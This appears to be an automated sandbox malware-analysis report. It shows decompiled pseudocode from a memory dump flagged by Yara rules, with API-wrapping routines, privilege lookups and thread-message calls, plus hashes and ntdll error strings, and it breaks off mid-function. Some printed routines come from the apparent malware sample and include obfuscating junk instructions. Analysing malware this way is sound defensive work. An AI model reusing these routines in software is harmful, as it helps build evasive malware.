                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 2b5f63a0f62bb7ea1f5768f459980a3a19115944dcf0dac96dca76d247912688
                                      • Instruction ID: 35377d4d56e4772cf1cafe64b969b096f062b47318e011255c6794c19f79d5da
                                      • Opcode Fuzzy Hash: 2b5f63a0f62bb7ea1f5768f459980a3a19115944dcf0dac96dca76d247912688
                                      • Instruction Fuzzy Hash: 52E0C2712401046BD710DFA4CC84EE77BA9EF48361F158A5AF90CEB282C530E9008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00419E90(intOrPtr _a4, void* _a8) {
                                      				long _t8;
                                      				void* _t11;
                                      
                                      				_t5 = _a4;
                                      				_t2 = _t5 + 0x10; // 0x300
                                      				_t3 = _t5 + 0xc50; // 0x40a923
                                      				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                      				_t8 = NtClose(_a8); // executed
                                      				return _t8;
                                      			}






                                      APIs
                                      • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 14178747a0483e2a0d86ca625ada06eb685170d18c9d65cf97a402b95c353934
                                      • Instruction ID: 98528293f29435077d5f91abe3b2da7f73907179604c6fc43cc38186773b0001
                                      • Opcode Fuzzy Hash: 14178747a0483e2a0d86ca625ada06eb685170d18c9d65cf97a402b95c353934
                                      • Instruction Fuzzy Hash: 509002B178110442D20061994414B064085E7E1781F51C029E1494594DC659CC5271A7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 68fa2a29da811b754005eccf7c055e6a3dcdcbcc3ff763589ebb62d687abdbd3
                                      • Instruction ID: f5c4056b28495e6d3cb2349dfb725b76864aa990669511b674e92f9f86a17a71
                                      • Opcode Fuzzy Hash: 68fa2a29da811b754005eccf7c055e6a3dcdcbcc3ff763589ebb62d687abdbd3
                                      • Instruction Fuzzy Hash: 3C9002B164110402D240719944047464085A7D0781F51C025A5494594EC6998DD576E6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: a95888832f5fc4eb25d8446fcb4623a108f524ee392352308ad5927f9257127b
                                      • Instruction ID: 3d74b7b3c31746c8be36866e9841a9e88b1707f6e98fd94f06b4db9556deffd6
                                      • Opcode Fuzzy Hash: a95888832f5fc4eb25d8446fcb4623a108f524ee392352308ad5927f9257127b
                                      • Instruction Fuzzy Hash: 07900271A4110502D20171994404616408AA7D06C1F91C036A1454595ECA658992B1B2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0954171cccfa866c7b49a95c242f10c54ec4d56c31e96ba8a8ba532dfd89a1b1
                                      • Instruction ID: 417c0c10cf10d461928674f504659498744d30e6858d19d43ee26cce21075613
                                      • Opcode Fuzzy Hash: 0954171cccfa866c7b49a95c242f10c54ec4d56c31e96ba8a8ba532dfd89a1b1
                                      • Instruction Fuzzy Hash: 92900271682141525645B19944045078086B7E06C1791C026A1844990CC5669856E6A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c08651c66f04c77e8288520548dd5a452b57c94c121010bfc9a9628569f02a57
                                      • Instruction ID: 766af965636845f1379f8bb80e92fee878e091f9d1146ac24cb27551420ea530
                                      • Opcode Fuzzy Hash: c08651c66f04c77e8288520548dd5a452b57c94c121010bfc9a9628569f02a57
                                      • Instruction Fuzzy Hash: 9890027164110413D211619945047074089A7D06C1F91C426A0854598DD6968952B1A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0c0331ef102d658ca9599ab9d6f48785d637d214207b3d6e132cb25104107c0a
                                      • Instruction ID: a56f2e439d07f9f59b86af82b34b38fece877204354b525c0a39fb25d01a857d
                                      • Opcode Fuzzy Hash: 0c0331ef102d658ca9599ab9d6f48785d637d214207b3d6e132cb25104107c0a
                                      • Instruction Fuzzy Hash: 4190027164150402D2006199481470B4085A7D0782F51C025A1594595DC665885175F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c4d1b3cb901b51ca0f7f93bf41918a454f91b0ebfb7666f335f22eae5a3fee09
                                      • Instruction ID: 212e8963b102ae4b9e38d484a372d20e49140eb87fdd38f4000efc7110b7a646
                                      • Opcode Fuzzy Hash: c4d1b3cb901b51ca0f7f93bf41918a454f91b0ebfb7666f335f22eae5a3fee09
                                      • Instruction Fuzzy Hash: 57900271A4110042424071A988449068085BBE1691751C135A0DC8590DC599886566E6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9eba1a26c50935ab0ca660bdf0d3c0bc41e5b356592c903860ed663503a40a16
                                      • Instruction ID: 65860a4bd7497321ddf0b1400f90560849e1b812fba8c21a653525ffa1dff083
                                      • Opcode Fuzzy Hash: 9eba1a26c50935ab0ca660bdf0d3c0bc41e5b356592c903860ed663503a40a16
                                      • Instruction Fuzzy Hash: 2990027165190042D30065A94C14B074085A7D0783F51C129A0584594CC955886165A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 76f9248da5dc3b8228828317789b3ba88ab3e446cf1a2040098bba5a2ca3ca53
                                      • Instruction ID: aca785886801314925750a3f3ef15b972f091a363c307944b28a5c2b60d8a6d7
                                      • Opcode Fuzzy Hash: 76f9248da5dc3b8228828317789b3ba88ab3e446cf1a2040098bba5a2ca3ca53
                                      • Instruction Fuzzy Hash: FE9002B164210003420571994414616808AA7E0681B51C035E14445D0DC565889171A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cb78eb676c49692493915c8cdf96aa4f365676105f4f8b77f1161dacbc293f11
                                      • Instruction ID: ec8475434d5be8865a90ec4409a8f815c346b6e6b96470c9ae09d136edbb3119
                                      • Opcode Fuzzy Hash: cb78eb676c49692493915c8cdf96aa4f365676105f4f8b77f1161dacbc293f11
                                      • Instruction Fuzzy Hash: 45900275651100030205A599070450740C6A7D57D1351C035F1445590CD661886161A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: da81d4dd13c186692c53dc3df80bdfbccef7b02031c33049b1912dd49b6aab4b
                                      • Instruction ID: cc28e43d3b7e8b89d85f84b3419af64cad43ea7393f230816a6210d040490894
                                      • Opcode Fuzzy Hash: da81d4dd13c186692c53dc3df80bdfbccef7b02031c33049b1912dd49b6aab4b
                                      • Instruction Fuzzy Hash: 3890027965310002D2807199540860A4085A7D1682F91D429A0445598CC955886963A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 09c38d568559c6b3168ee947ebf255f5eb3412a8407bc7ae24d6ea237338e21c
                                      • Instruction ID: bc93be3a73162f47519c86f294200628201d803fcbf1011ee2ae7847905c3038
                                      • Opcode Fuzzy Hash: 09c38d568559c6b3168ee947ebf255f5eb3412a8407bc7ae24d6ea237338e21c
                                      • Instruction Fuzzy Hash: 4B90027174110003D240719954186068085F7E1781F51D025E0844594CD955885662A3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 48bb5abcc050d36631dc76c396881abe909246f9f79de0e3aa6ea1b09939fbc8
                                      • Instruction ID: 53a7433d9c278273d14623c4d96abfc155c5cbcd8ff6c787ffcaed6bfb18711f
                                      • Opcode Fuzzy Hash: 48bb5abcc050d36631dc76c396881abe909246f9f79de0e3aa6ea1b09939fbc8
                                      • Instruction Fuzzy Hash: 1B90027164110402D20065D954086464085A7E0781F51D025A5454595EC6A5889171B2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E0041A0A2(intOrPtr _a4, int _a8) {
                                      				void* _t7;
                                      				void* _t14;
                                      				void* _t15;
                                      				signed int _t17;
                                      
                                      				_t17 =  *(_t7 + _t15 - 0x32a4c092) * 0xaa238cd7;
                                      				asm("loope 0xffffffc5");
                                      				_push(_t17);
                                      				_t8 = _a4;
                                      				_push(_t15);
                                      				E0041A960(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                                      				ExitProcess(_a8);
                                      			}








                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitFreeHeapProcess
                                      • String ID:
                                      • API String ID: 1180424539-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 57%
                                      			E004082E8(void* __eflags, long _a8) {
                                      				char _v63;
                                      				char _v64;
                                      				void* _t12;
                                      				int _t13;
                                      				void* _t16;
                                      				long _t21;
                                      				int _t26;
                                      				void* _t28;
                                      				void* _t30;
                                      				void* _t32;
                                      				void* _t37;
                                      
                                      				_t37 = __eflags;
                                      				asm("lahf");
                                      				_t32 = _t28;
                                      				_pop(_t29);
                                      				asm("insd");
                                      				asm("invalid");
                                      				_t30 = _t32;
                                      				_v64 = 0;
                                      				E0041B860( &_v63, 0, 0x3f);
                                      				E0041C400( &_v64, 3);
                                      				_t12 = E0040ACD0(_t16, _t37, _a8 + 0x1c,  &_v64); // executed
                                      				_t13 = E00414E20(_a8 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                      				_t26 = _t13;
                                      				if(_t26 != 0) {
                                      					_t21 = _a8;
                                      					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                      					_t39 = _t13;
                                      					if(_t13 == 0) {
                                      						_t13 =  *_t26(_t21, 0x8003, _t30 + (E0040A460(_t39, 1, 8) & 0x000000ff) - 0x40, _t13);
                                      					}
                                      				}
                                      				return _t13;
                                      			}















                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 82%
                                      			E004082F0(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
                                      				char _v67;
                                      				char _v68;
                                      				void* _t12;
                                      				intOrPtr* _t13;
                                      				int _t14;
                                      				long _t22;
                                      				intOrPtr* _t26;
                                      				void* _t27;
                                      				void* _t31;
                                      
                                      				_t31 = __eflags;
                                      				_v68 = 0;
                                      				E0041B860( &_v67, 0, 0x3f);
                                      				E0041C400( &_v68, 3);
                                      				_t12 = E0040ACD0(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
                                      				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                      				_t26 = _t13;
                                      				if(_t26 != 0) {
                                      					_t22 = _a8;
                                      					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                      					_t33 = _t14;
                                      					if(_t14 == 0) {
                                      						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                      					}
                                      					return _t14;
                                      				}
                                      				return _t13;
                                      			}













                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                      				char _t10;
                                      				void* _t15;
                                      
                                      				_t3 = _a4 + 0xc74; // 0xc74
                                      				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}






                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                      				void* _t10;
                                      				void* _t15;
                                      
                                      				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                      				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}






                                      APIs
                                      • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                      				int _t10;
                                      				void* _t15;
                                      
                                      				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                      				return _t10;
                                      			}






                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0041A0B0(intOrPtr _a4, int _a8) {
                                      				void* _t10;
                                      
                                      				_t5 = _a4;
                                      				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                      				ExitProcess(_a8);
                                      			}





                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Strings
                                      • an invalid address, %p, xrefs: 01A2B4CF
                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A2B3D6
                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A2B314
                                      • *** enter .cxr %p for the context, xrefs: 01A2B50D
                                      • *** then kb to get the faulting stack, xrefs: 01A2B51C
                                      • <unknown>, xrefs: 01A2B27E, 01A2B2D1, 01A2B350, 01A2B399, 01A2B417, 01A2B48E
                                      • read from, xrefs: 01A2B4AD, 01A2B4B2
                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A2B53F
                                      • Go determine why that thread has not released the critical section., xrefs: 01A2B3C5
                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01A2B2F3
                                      • a NULL pointer, xrefs: 01A2B4E0
                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A2B38F
                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A2B47D
                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A2B39B
                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A2B476
                                      • *** An Access Violation occurred in %ws:%s, xrefs: 01A2B48F
                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A2B2DC
                                      • This failed because of error %Ix., xrefs: 01A2B446
                                      • The critical section is owned by thread %p., xrefs: 01A2B3B9
                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A2B484
                                      • *** enter .exr %p for the exception record, xrefs: 01A2B4F1
                                      • The resource is owned shared by %d threads, xrefs: 01A2B37E
                                      • The resource is owned exclusively by thread %p, xrefs: 01A2B374
                                      • The instruction at %p tried to %s , xrefs: 01A2B4B6
                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A2B305
                                      • write to, xrefs: 01A2B4A6
                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A2B323
                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 01A2B352
                                      • *** Inpage error in %ws:%s, xrefs: 01A2B418
                                      • The instruction at %p referenced memory at %p., xrefs: 01A2B432
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • API String ID: 0-108210295
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 44%
                                      			E01A31C06() {
                                      				signed int _t27;
                                      				char* _t104;
                                      				char* _t105;
                                      				intOrPtr _t113;
                                      				intOrPtr _t115;
                                      				intOrPtr _t117;
                                      				intOrPtr _t119;
                                      				intOrPtr _t120;
                                      
                                      				_t105 = 0x19548a4;
                                      				_t104 = "HEAP: ";
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      					_push(_t104);
                                      					E0197B150();
                                      				} else {
                                      					E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      				}
                                      				_push( *0x1a6589c);
                                      				E0197B150("Heap error detected at %p (heap handle %p)\n",  *0x1a658a0);
                                      				_t27 =  *0x1a65898; // 0x0
                                      				if(_t27 <= 0xf) {
                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M01A31E96))) {
                                      						case 0:
                                      							_t105 = "heap_failure_internal";
                                      							goto L21;
                                      						case 1:
                                      							goto L21;
                                      						case 2:
                                      							goto L21;
                                      						case 3:
                                      							goto L21;
                                      						case 4:
                                      							goto L21;
                                      						case 5:
                                      							goto L21;
                                      						case 6:
                                      							goto L21;
                                      						case 7:
                                      							goto L21;
                                      						case 8:
                                      							goto L21;
                                      						case 9:
                                      							goto L21;
                                      						case 0xa:
                                      							goto L21;
                                      						case 0xb:
                                      							goto L21;
                                      						case 0xc:
                                      							goto L21;
                                      						case 0xd:
                                      							goto L21;
                                      						case 0xe:
                                      							goto L21;
                                      						case 0xf:
                                      							goto L21;
                                      					}
                                      				}
                                      				L21:
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      					_push(_t104);
                                      					E0197B150();
                                      				} else {
                                      					E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      				}
                                      				_push(_t105);
                                      				E0197B150("Error code: %d - %s\n",  *0x1a65898);
                                      				_t113 =  *0x1a658a4; // 0x0
                                      				if(_t113 != 0) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E0197B150("Parameter1: %p\n",  *0x1a658a4);
                                      				}
                                      				_t115 =  *0x1a658a8; // 0x0
                                      				if(_t115 != 0) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E0197B150("Parameter2: %p\n",  *0x1a658a8);
                                      				}
                                      				_t117 =  *0x1a658ac; // 0x0
                                      				if(_t117 != 0) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E0197B150("Parameter3: %p\n",  *0x1a658ac);
                                      				}
                                      				_t119 =  *0x1a658b0; // 0x0
                                      				if(_t119 != 0) {
                                      					L41:
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push(_t104);
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					_push( *0x1a658b4);
                                      					E0197B150("Last known valid blocks: before - %p, after - %p\n",  *0x1a658b0);
                                      				} else {
                                      					_t120 =  *0x1a658b4; // 0x0
                                      					if(_t120 != 0) {
                                      						goto L41;
                                      					}
                                      				}
                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      					_push(_t104);
                                      					E0197B150();
                                      				} else {
                                      					E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      				}
                                      				return E0197B150("Stack trace available at %p\n", 0x1a658c0);
                                      			}












                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                      • API String ID: 0-2897834094
                                      • Opcode ID: 7d1d338c0ddba7e2bfdd7d97c9954adb4a0ce42ecb7123956a22c3850a272fe1
                                      • Instruction ID: abdc947bb9ce42a6dc16a4be523c17f6ca55e225216659689cb3908515407696
                                      • Opcode Fuzzy Hash: 7d1d338c0ddba7e2bfdd7d97c9954adb4a0ce42ecb7123956a22c3850a272fe1
                                      • Instruction Fuzzy Hash: 1661B63A911285DFD712EB49E485F30B3F8FFC4970B0D806AF80E5B711E6249C518B2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 59%
                                      			E01A34AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                      				signed int _v6;
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t189;
                                      				intOrPtr _t191;
                                      				intOrPtr _t210;
                                      				signed int _t225;
                                      				signed char _t231;
                                      				intOrPtr _t232;
                                      				unsigned int _t245;
                                      				intOrPtr _t249;
                                      				intOrPtr _t259;
